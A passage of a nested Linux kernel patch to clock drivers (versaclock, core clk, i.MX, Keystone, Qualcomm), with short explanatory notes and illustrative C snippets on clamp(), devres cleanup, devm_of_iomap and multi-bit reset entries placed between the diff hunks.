++			ret = -ENOMEM;
++			goto err_clk;
++		}
+ 		init.ops = &vc5_clk_out_ops;
+ 		init.flags = CLK_SET_RATE_PARENT;
+ 		init.parent_names = parent_names;
+@@ -1258,13 +1284,13 @@ static const struct vc5_chip_info idt_5p49v6975_info = {
+ };
+ 
+ static const struct i2c_device_id vc5_id[] = {
+-	{ "5p49v5923", .driver_data = IDT_VC5_5P49V5923 },
+-	{ "5p49v5925", .driver_data = IDT_VC5_5P49V5925 },
+-	{ "5p49v5933", .driver_data = IDT_VC5_5P49V5933 },
+-	{ "5p49v5935", .driver_data = IDT_VC5_5P49V5935 },
+-	{ "5p49v6901", .driver_data = IDT_VC6_5P49V6901 },
+-	{ "5p49v6965", .driver_data = IDT_VC6_5P49V6965 },
+-	{ "5p49v6975", .driver_data = IDT_VC6_5P49V6975 },
++	{ "5p49v5923", .driver_data = (kernel_ulong_t)&idt_5p49v5923_info },
++	{ "5p49v5925", .driver_data = (kernel_ulong_t)&idt_5p49v5925_info },
++	{ "5p49v5933", .driver_data = (kernel_ulong_t)&idt_5p49v5933_info },
++	{ "5p49v5935", .driver_data = (kernel_ulong_t)&idt_5p49v5935_info },
++	{ "5p49v6901", .driver_data = (kernel_ulong_t)&idt_5p49v6901_info },
++	{ "5p49v6965", .driver_data = (kernel_ulong_t)&idt_5p49v6965_info },
++	{ "5p49v6975", .driver_data = (kernel_ulong_t)&idt_5p49v6975_info },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(i2c, vc5_id);
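
The vc5_pll_round_rate() change is purely cosmetic: clamp(val, lo, hi) from <linux/minmax.h> computes min(max(val, lo), hi), exactly what the two removed if statements did. Equivalent standalone arithmetic (the macro below is a simplified stand-in for the kernel's type-checked version):

    #include <stdio.h>

    #define clamp(val, lo, hi) \
            ((val) < (lo) ? (lo) : ((val) > (hi) ? (hi) : (val)))

    int main(void)
    {
            long lo = 2500, hi = 3000;

            printf("%ld %ld %ld\n",
                   clamp(1000L, lo, hi),  /* 2500: raised to floor  */
                   clamp(2800L, lo, hi),  /* 2800: already in range */
                   clamp(9999L, lo, hi)); /* 3000: cut to ceiling   */
            return 0;
    }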
+diff --git a/drivers/clk/clk-versaclock7.c b/drivers/clk/clk-versaclock7.c
+index 8e4f86e852aa0..0ae191f50b4b2 100644
+--- a/drivers/clk/clk-versaclock7.c
++++ b/drivers/clk/clk-versaclock7.c
+@@ -1282,7 +1282,7 @@ static const struct regmap_config vc7_regmap_config = {
+ };
+ 
+ static const struct i2c_device_id vc7_i2c_id[] = {
+-	{ "rc21008a", VC7_RC21008A },
++	{ "rc21008a", .driver_data = (kernel_ulong_t)&vc7_rc21008a_info },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(i2c, vc7_i2c_id);
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index 57b83665e5c3a..e0de6565800d2 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -1525,6 +1525,7 @@ void clk_hw_forward_rate_request(const struct clk_hw *hw,
+ 				  parent->core, req,
+ 				  parent_rate);
+ }
++EXPORT_SYMBOL_GPL(clk_hw_forward_rate_request);
+ 
+ static bool clk_core_can_round(struct clk_core * const core)
+ {
+@@ -4650,6 +4651,7 @@ int devm_clk_notifier_register(struct device *dev, struct clk *clk,
+ 	if (!ret) {
+ 		devres->clk = clk;
+ 		devres->nb = nb;
++		devres_add(dev, devres);
+ 	} else {
+ 		devres_free(devres);
+ 	}
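
The devm_clk_notifier_register() fix restores the invariant behind every devres helper: devres_alloc() only allocates the tracked resource, devres_add() is what arms the release action on the device, and devres_free() is the failure path; without the devres_add() the cleanup never runs. The canonical skeleton (struct foo and its register/unregister calls are hypothetical):

    static void foo_release(struct device *dev, void *res)
    {
            foo_unregister(*(struct foo **)res);
    }

    int devm_foo_register(struct device *dev, struct foo *f)
    {
            struct foo **ptr;
            int ret;

            ptr = devres_alloc(foo_release, sizeof(*ptr), GFP_KERNEL);
            if (!ptr)
                    return -ENOMEM;

            ret = foo_register(f);
            if (!ret) {
                    *ptr = f;
                    devres_add(dev, ptr);   /* arm cleanup on unbind */
            } else {
                    devres_free(ptr);       /* nothing to undo, free */
            }
            return ret;
    }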
+diff --git a/drivers/clk/imx/clk-imx8mn.c b/drivers/clk/imx/clk-imx8mn.c
+index 2afea905f7f3c..b2b8b8b3f0ab8 100644
+--- a/drivers/clk/imx/clk-imx8mn.c
++++ b/drivers/clk/imx/clk-imx8mn.c
+@@ -323,7 +323,7 @@ static int imx8mn_clocks_probe(struct platform_device *pdev)
+ 	void __iomem *base;
+ 	int ret;
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws,
+ 					  IMX8MN_CLK_END), GFP_KERNEL);
+ 	if (WARN_ON(!clk_hw_data))
+ 		return -ENOMEM;
+@@ -340,10 +340,10 @@ static int imx8mn_clocks_probe(struct platform_device *pdev)
+ 	hws[IMX8MN_CLK_EXT4] = imx_obtain_fixed_clk_hw(np, "clk_ext4");
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx8mn-anatop");
+-	base = of_iomap(np, 0);
++	base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+-	if (WARN_ON(!base)) {
+-		ret = -ENOMEM;
++	if (WARN_ON(IS_ERR(base))) {
++		ret = PTR_ERR(base);
+ 		goto unregister_hws;
+ 	}
+ 
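
The i.MX hunks here and below all make the same two conversions: kzalloc()/of_iomap() become devm_kzalloc()/devm_of_iomap() so the error paths no longer need manual kfree()/iounmap(), and failed registrations unwind through imx_unregister_hw_clocks(). The devm_of_iomap() shape, condensed (compatible string hypothetical):

    np = of_find_compatible_node(NULL, NULL, "vendor,example-anatop");
    base = devm_of_iomap(dev, np, 0, NULL);
    of_node_put(np);        /* the mapping, not the node, is retained */
    if (IS_ERR(base))
            return PTR_ERR(base);   /* unmapped automatically later */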
+diff --git a/drivers/clk/imx/clk-imx8mp.c b/drivers/clk/imx/clk-imx8mp.c
+index 5d68d975b4eb1..05c02f4e2a143 100644
+--- a/drivers/clk/imx/clk-imx8mp.c
++++ b/drivers/clk/imx/clk-imx8mp.c
+@@ -413,25 +413,22 @@ static int imx8mp_clocks_probe(struct platform_device *pdev)
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *np;
+ 	void __iomem *anatop_base, *ccm_base;
++	int err;
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx8mp-anatop");
+-	anatop_base = of_iomap(np, 0);
++	anatop_base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+-	if (WARN_ON(!anatop_base))
+-		return -ENOMEM;
++	if (WARN_ON(IS_ERR(anatop_base)))
++		return PTR_ERR(anatop_base);
+ 
+ 	np = dev->of_node;
+ 	ccm_base = devm_platform_ioremap_resource(pdev, 0);
+-	if (WARN_ON(IS_ERR(ccm_base))) {
+-		iounmap(anatop_base);
++	if (WARN_ON(IS_ERR(ccm_base)))
+ 		return PTR_ERR(ccm_base);
+-	}
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws, IMX8MP_CLK_END), GFP_KERNEL);
+-	if (WARN_ON(!clk_hw_data)) {
+-		iounmap(anatop_base);
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws, IMX8MP_CLK_END), GFP_KERNEL);
++	if (WARN_ON(!clk_hw_data))
+ 		return -ENOMEM;
+-	}
+ 
+ 	clk_hw_data->num = IMX8MP_CLK_END;
+ 	hws = clk_hw_data->hws;
+@@ -711,7 +708,12 @@ static int imx8mp_clocks_probe(struct platform_device *pdev)
+ 
+ 	imx_check_clk_hws(hws, IMX8MP_CLK_END);
+ 
+-	of_clk_add_hw_provider(np, of_clk_hw_onecell_get, clk_hw_data);
++	err = of_clk_add_hw_provider(np, of_clk_hw_onecell_get, clk_hw_data);
++	if (err < 0) {
++		dev_err(dev, "failed to register hws for i.MX8MP\n");
++		imx_unregister_hw_clocks(hws, IMX8MP_CLK_END);
++		return err;
++	}
+ 
+ 	imx_register_uart_clocks(4);
+ 
+diff --git a/drivers/clk/imx/clk-imx93.c b/drivers/clk/imx/clk-imx93.c
+index 02d6a9894521d..5e3d299190c89 100644
+--- a/drivers/clk/imx/clk-imx93.c
++++ b/drivers/clk/imx/clk-imx93.c
+@@ -261,7 +261,7 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 	void __iomem *base, *anatop_base;
+ 	int i, ret;
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws,
+ 					  IMX93_CLK_END), GFP_KERNEL);
+ 	if (!clk_hw_data)
+ 		return -ENOMEM;
+@@ -285,10 +285,12 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 								    "sys_pll_pfd2", 1, 2);
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx93-anatop");
+-	anatop_base = of_iomap(np, 0);
++	anatop_base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+-	if (WARN_ON(!anatop_base))
+-		return -ENOMEM;
++	if (WARN_ON(IS_ERR(anatop_base))) {
++		ret = PTR_ERR(anatop_base);
++		goto unregister_hws;
++	}
+ 
+ 	clks[IMX93_CLK_AUDIO_PLL] = imx_clk_fracn_gppll("audio_pll", "osc_24m", anatop_base + 0x1200,
+ 							&imx_fracn_gppll);
+@@ -298,8 +300,8 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 	np = dev->of_node;
+ 	base = devm_platform_ioremap_resource(pdev, 0);
+ 	if (WARN_ON(IS_ERR(base))) {
+-		iounmap(anatop_base);
+-		return PTR_ERR(base);
++		ret = PTR_ERR(base);
++		goto unregister_hws;
+ 	}
+ 
+ 	for (i = 0; i < ARRAY_SIZE(root_array); i++) {
+@@ -329,7 +331,6 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 
+ unregister_hws:
+ 	imx_unregister_hw_clocks(clks, IMX93_CLK_END);
+-	iounmap(anatop_base);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/clk/imx/clk-imxrt1050.c b/drivers/clk/imx/clk-imxrt1050.c
+index 26108e9f7e67a..64d8b65a81040 100644
+--- a/drivers/clk/imx/clk-imxrt1050.c
++++ b/drivers/clk/imx/clk-imxrt1050.c
+@@ -42,7 +42,7 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 	struct device_node *anp;
+ 	int ret;
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws,
+ 					  IMXRT1050_CLK_END), GFP_KERNEL);
+ 	if (WARN_ON(!clk_hw_data))
+ 		return -ENOMEM;
+@@ -53,10 +53,12 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 	hws[IMXRT1050_CLK_OSC] = imx_obtain_fixed_clk_hw(np, "osc");
+ 
+ 	anp = of_find_compatible_node(NULL, NULL, "fsl,imxrt-anatop");
+-	pll_base = of_iomap(anp, 0);
++	pll_base = devm_of_iomap(dev, anp, 0, NULL);
+ 	of_node_put(anp);
+-	if (WARN_ON(!pll_base))
+-		return -ENOMEM;
++	if (WARN_ON(IS_ERR(pll_base))) {
++		ret = PTR_ERR(pll_base);
++		goto unregister_hws;
++	}
+ 
+ 	/* Anatop clocks */
+ 	hws[IMXRT1050_CLK_DUMMY] = imx_clk_hw_fixed("dummy", 0UL);
+@@ -104,8 +106,10 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 
+ 	/* CCM clocks */
+ 	ccm_base = devm_platform_ioremap_resource(pdev, 0);
+-	if (WARN_ON(IS_ERR(ccm_base)))
+-		return PTR_ERR(ccm_base);
++	if (WARN_ON(IS_ERR(ccm_base))) {
++		ret = PTR_ERR(ccm_base);
++		goto unregister_hws;
++	}
+ 
+ 	hws[IMXRT1050_CLK_ARM_PODF] = imx_clk_hw_divider("arm_podf", "pll1_arm", ccm_base + 0x10, 0, 3);
+ 	hws[IMXRT1050_CLK_PRE_PERIPH_SEL] = imx_clk_hw_mux("pre_periph_sel", ccm_base + 0x18, 18, 2,
+@@ -148,8 +152,12 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 	ret = of_clk_add_hw_provider(np, of_clk_hw_onecell_get, clk_hw_data);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Failed to register clks for i.MXRT1050.\n");
+-		imx_unregister_hw_clocks(hws, IMXRT1050_CLK_END);
++		goto unregister_hws;
+ 	}
++	return 0;
++
++unregister_hws:
++	imx_unregister_hw_clocks(hws, IMXRT1050_CLK_END);
+ 	return ret;
+ }
+ static const struct of_device_id imxrt1050_clk_of_match[] = {
+diff --git a/drivers/clk/imx/clk-scu.c b/drivers/clk/imx/clk-scu.c
+index 1e6870f3671f6..db307890e4c16 100644
+--- a/drivers/clk/imx/clk-scu.c
++++ b/drivers/clk/imx/clk-scu.c
+@@ -707,11 +707,11 @@ struct clk_hw *imx_clk_scu_alloc_dev(const char *name,
+ 
+ void imx_clk_scu_unregister(void)
+ {
+-	struct imx_scu_clk_node *clk;
++	struct imx_scu_clk_node *clk, *n;
+ 	int i;
+ 
+ 	for (i = 0; i < IMX_SC_R_LAST; i++) {
+-		list_for_each_entry(clk, &imx_scu_clks[i], node) {
++		list_for_each_entry_safe(clk, n, &imx_scu_clks[i], node) {
+ 			clk_hw_unregister(clk->hw);
+ 			kfree(clk);
+ 		}
+diff --git a/drivers/clk/keystone/sci-clk.c b/drivers/clk/keystone/sci-clk.c
+index d4b4e74e22da6..254f2cf24be21 100644
+--- a/drivers/clk/keystone/sci-clk.c
++++ b/drivers/clk/keystone/sci-clk.c
+@@ -294,6 +294,8 @@ static int _sci_clk_build(struct sci_clk_provider *provider,
+ 
+ 	name = kasprintf(GFP_KERNEL, "clk:%d:%d", sci_clk->dev_id,
+ 			 sci_clk->clk_id);
++	if (!name)
++		return -ENOMEM;
+ 
+ 	init.name = name;
+ 
+diff --git a/drivers/clk/qcom/camcc-sc7180.c b/drivers/clk/qcom/camcc-sc7180.c
+index e2b4804695f37..8a4ba7a19ed12 100644
+--- a/drivers/clk/qcom/camcc-sc7180.c
++++ b/drivers/clk/qcom/camcc-sc7180.c
+@@ -1480,12 +1480,21 @@ static struct clk_branch cam_cc_sys_tmr_clk = {
+ 	},
+ };
+ 
++static struct gdsc titan_top_gdsc = {
++	.gdscr = 0xb134,
++	.pd = {
++		.name = "titan_top_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++};
++
+ static struct gdsc bps_gdsc = {
+ 	.gdscr = 0x6004,
+ 	.pd = {
+ 		.name = "bps_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &titan_top_gdsc.pd,
+ 	.flags = HW_CTRL,
+ };
+ 
+@@ -1495,6 +1504,7 @@ static struct gdsc ife_0_gdsc = {
+ 		.name = "ife_0_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &titan_top_gdsc.pd,
+ };
+ 
+ static struct gdsc ife_1_gdsc = {
+@@ -1503,6 +1513,7 @@ static struct gdsc ife_1_gdsc = {
+ 		.name = "ife_1_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &titan_top_gdsc.pd,
+ };
+ 
+ static struct gdsc ipe_0_gdsc = {
+@@ -1512,15 +1523,9 @@ static struct gdsc ipe_0_gdsc = {
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+ 	.flags = HW_CTRL,
++	.parent = &titan_top_gdsc.pd,
+ };
+ 
+-static struct gdsc titan_top_gdsc = {
+-	.gdscr = 0xb134,
+-	.pd = {
+-		.name = "titan_top_gdsc",
+-	},
+-	.pwrsts = PWRSTS_OFF_ON,
+-};
+ 
+ static struct clk_hw *cam_cc_sc7180_hws[] = {
+ 	[CAM_CC_PLL2_OUT_EARLY] = &cam_cc_pll2_out_early.hw,
+diff --git a/drivers/clk/qcom/dispcc-qcm2290.c b/drivers/clk/qcom/dispcc-qcm2290.c
+index 24755dc841f9d..5cec98c4e8372 100644
+--- a/drivers/clk/qcom/dispcc-qcm2290.c
++++ b/drivers/clk/qcom/dispcc-qcm2290.c
+@@ -23,9 +23,11 @@
+ 
+ enum {
+ 	P_BI_TCXO,
++	P_BI_TCXO_AO,
+ 	P_DISP_CC_PLL0_OUT_MAIN,
+ 	P_DSI0_PHY_PLL_OUT_BYTECLK,
+ 	P_DSI0_PHY_PLL_OUT_DSICLK,
++	P_GPLL0_OUT_DIV,
+ 	P_GPLL0_OUT_MAIN,
+ 	P_SLEEP_CLK,
+ };
+@@ -81,8 +83,8 @@ static const struct clk_parent_data disp_cc_parent_data_1[] = {
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_2[] = {
+-	{ P_BI_TCXO, 0 },
+-	{ P_GPLL0_OUT_MAIN, 4 },
++	{ P_BI_TCXO_AO, 0 },
++	{ P_GPLL0_OUT_DIV, 4 },
+ };
+ 
+ static const struct clk_parent_data disp_cc_parent_data_2[] = {
+@@ -150,9 +152,9 @@ static struct clk_regmap_div disp_cc_mdss_byte0_div_clk_src = {
+ };
+ 
+ static const struct freq_tbl ftbl_disp_cc_mdss_ahb_clk_src[] = {
+-	F(19200000, P_BI_TCXO, 1, 0, 0),
+-	F(37500000, P_GPLL0_OUT_MAIN, 8, 0, 0),
+-	F(75000000, P_GPLL0_OUT_MAIN, 4, 0, 0),
++	F(19200000, P_BI_TCXO_AO, 1, 0, 0),
++	F(37500000, P_GPLL0_OUT_DIV, 8, 0, 0),
++	F(75000000, P_GPLL0_OUT_DIV, 4, 0, 0),
+ 	{ }
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-ipq6018.c b/drivers/clk/qcom/gcc-ipq6018.c
+index 3f9c2f61a5d93..cde62a11f5736 100644
+--- a/drivers/clk/qcom/gcc-ipq6018.c
++++ b/drivers/clk/qcom/gcc-ipq6018.c
+@@ -1654,7 +1654,7 @@ static struct clk_rcg2 sdcc1_apps_clk_src = {
+ 		.name = "sdcc1_apps_clk_src",
+ 		.parent_data = gcc_xo_gpll0_gpll2_gpll0_out_main_div2,
+ 		.num_parents = 4,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+ 
+@@ -4517,24 +4517,24 @@ static const struct qcom_reset_map gcc_ipq6018_resets[] = {
+ 	[GCC_PCIE0_AHB_ARES] = { 0x75040, 5 },
+ 	[GCC_PCIE0_AXI_MASTER_STICKY_ARES] = { 0x75040, 6 },
+ 	[GCC_PCIE0_AXI_SLAVE_STICKY_ARES] = { 0x75040, 7 },
+-	[GCC_PPE_FULL_RESET] = { 0x68014, 0 },
+-	[GCC_UNIPHY0_SOFT_RESET] = { 0x56004, 0 },
++	[GCC_PPE_FULL_RESET] = { .reg = 0x68014, .bitmask = 0xf0000 },
++	[GCC_UNIPHY0_SOFT_RESET] = { .reg = 0x56004, .bitmask = 0x3ff2 },
+ 	[GCC_UNIPHY0_XPCS_RESET] = { 0x56004, 2 },
+-	[GCC_UNIPHY1_SOFT_RESET] = { 0x56104, 0 },
++	[GCC_UNIPHY1_SOFT_RESET] = { .reg = 0x56104, .bitmask = 0x32 },
+ 	[GCC_UNIPHY1_XPCS_RESET] = { 0x56104, 2 },
+-	[GCC_EDMA_HW_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT1_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT2_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT3_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT4_RESET] = { 0x68014, 0 },
+-	[GCC_NSSPORT5_RESET] = { 0x68014, 0 },
+-	[GCC_UNIPHY0_PORT1_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT2_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT3_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT4_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT5_ARES] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT_4_5_RESET] = { 0x56004, 0 },
+-	[GCC_UNIPHY0_PORT_4_RESET] = { 0x56004, 0 },
++	[GCC_EDMA_HW_RESET] = { .reg = 0x68014, .bitmask = 0x300000 },
++	[GCC_NSSPORT1_RESET] = { .reg = 0x68014, .bitmask = 0x1000003 },
++	[GCC_NSSPORT2_RESET] = { .reg = 0x68014, .bitmask = 0x200000c },
++	[GCC_NSSPORT3_RESET] = { .reg = 0x68014, .bitmask = 0x4000030 },
++	[GCC_NSSPORT4_RESET] = { .reg = 0x68014, .bitmask = 0x8000300 },
++	[GCC_NSSPORT5_RESET] = { .reg = 0x68014, .bitmask = 0x10000c00 },
++	[GCC_UNIPHY0_PORT1_ARES] = { .reg = 0x56004, .bitmask = 0x30 },
++	[GCC_UNIPHY0_PORT2_ARES] = { .reg = 0x56004, .bitmask = 0xc0 },
++	[GCC_UNIPHY0_PORT3_ARES] = { .reg = 0x56004, .bitmask = 0x300 },
++	[GCC_UNIPHY0_PORT4_ARES] = { .reg = 0x56004, .bitmask = 0xc00 },
++	[GCC_UNIPHY0_PORT5_ARES] = { .reg = 0x56004, .bitmask = 0x3000 },
++	[GCC_UNIPHY0_PORT_4_5_RESET] = { .reg = 0x56004, .bitmask = 0x3c02 },
++	[GCC_UNIPHY0_PORT_4_RESET] = { .reg = 0x56004, .bitmask = 0xc02 },
+ 	[GCC_LPASS_BCR] = {0x1F000, 0},
+ 	[GCC_UBI32_TBU_BCR] = {0x65000, 0},
+ 	[GCC_LPASS_TBU_BCR] = {0x6C000, 0},
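
The ipq6018 reset-table rewrite switches entries from the positional { reg, bit } form, which can only toggle a single bit, to an explicit .bitmask so that one logical reset asserts several related bits in one write. The two entry shapes side by side (enum names hypothetical, offsets copied from the table above; this assumes the bitmask field the qcom reset driver gained in the same series):

    static const struct qcom_reset_map example_resets[] = {
            /* single bit: bit 5 of the register at 0x75040 */
            [EXAMPLE_SINGLE] = { 0x75040, 5 },
            /* multiple bits: 0x1000003 = bits 0, 1 and 24 together */
            [EXAMPLE_MULTI] = { .reg = 0x68014,
                                .bitmask = BIT(24) | GENMASK(1, 0) },
    };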
+diff --git a/drivers/clk/qcom/gcc-qcm2290.c b/drivers/clk/qcom/gcc-qcm2290.c
+index 096deff2ba257..48995e50c6bd7 100644
+--- a/drivers/clk/qcom/gcc-qcm2290.c
++++ b/drivers/clk/qcom/gcc-qcm2290.c
+@@ -650,7 +650,7 @@ static struct clk_rcg2 gcc_usb30_prim_mock_utmi_clk_src = {
+ 		.name = "gcc_usb30_prim_mock_utmi_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -686,7 +686,7 @@ static struct clk_rcg2 gcc_camss_axi_clk_src = {
+ 		.name = "gcc_camss_axi_clk_src",
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -706,7 +706,7 @@ static struct clk_rcg2 gcc_camss_cci_clk_src = {
+ 		.name = "gcc_camss_cci_clk_src",
+ 		.parent_data = gcc_parents_9,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_9),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -728,7 +728,7 @@ static struct clk_rcg2 gcc_camss_csi0phytimer_clk_src = {
+ 		.name = "gcc_camss_csi0phytimer_clk_src",
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -742,7 +742,7 @@ static struct clk_rcg2 gcc_camss_csi1phytimer_clk_src = {
+ 		.name = "gcc_camss_csi1phytimer_clk_src",
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -764,7 +764,7 @@ static struct clk_rcg2 gcc_camss_mclk0_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -779,7 +779,7 @@ static struct clk_rcg2 gcc_camss_mclk1_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -794,7 +794,7 @@ static struct clk_rcg2 gcc_camss_mclk2_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -809,7 +809,7 @@ static struct clk_rcg2 gcc_camss_mclk3_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -830,7 +830,7 @@ static struct clk_rcg2 gcc_camss_ope_ahb_clk_src = {
+ 		.name = "gcc_camss_ope_ahb_clk_src",
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -854,7 +854,7 @@ static struct clk_rcg2 gcc_camss_ope_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -888,7 +888,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_clk_src = {
+ 		.name = "gcc_camss_tfe_0_clk_src",
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -912,7 +912,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_csid_clk_src = {
+ 		.name = "gcc_camss_tfe_0_csid_clk_src",
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -926,7 +926,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_clk_src = {
+ 		.name = "gcc_camss_tfe_1_clk_src",
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -940,7 +940,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_csid_clk_src = {
+ 		.name = "gcc_camss_tfe_1_csid_clk_src",
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -963,7 +963,7 @@ static struct clk_rcg2 gcc_camss_tfe_cphy_rx_clk_src = {
+ 		.parent_data = gcc_parents_10,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_10),
+ 		.flags = CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -984,7 +984,7 @@ static struct clk_rcg2 gcc_camss_top_ahb_clk_src = {
+ 		.name = "gcc_camss_top_ahb_clk_src",
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1006,7 +1006,7 @@ static struct clk_rcg2 gcc_gp1_clk_src = {
+ 		.name = "gcc_gp1_clk_src",
+ 		.parent_data = gcc_parents_2,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_2),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1020,7 +1020,7 @@ static struct clk_rcg2 gcc_gp2_clk_src = {
+ 		.name = "gcc_gp2_clk_src",
+ 		.parent_data = gcc_parents_2,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_2),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1034,7 +1034,7 @@ static struct clk_rcg2 gcc_gp3_clk_src = {
+ 		.name = "gcc_gp3_clk_src",
+ 		.parent_data = gcc_parents_2,
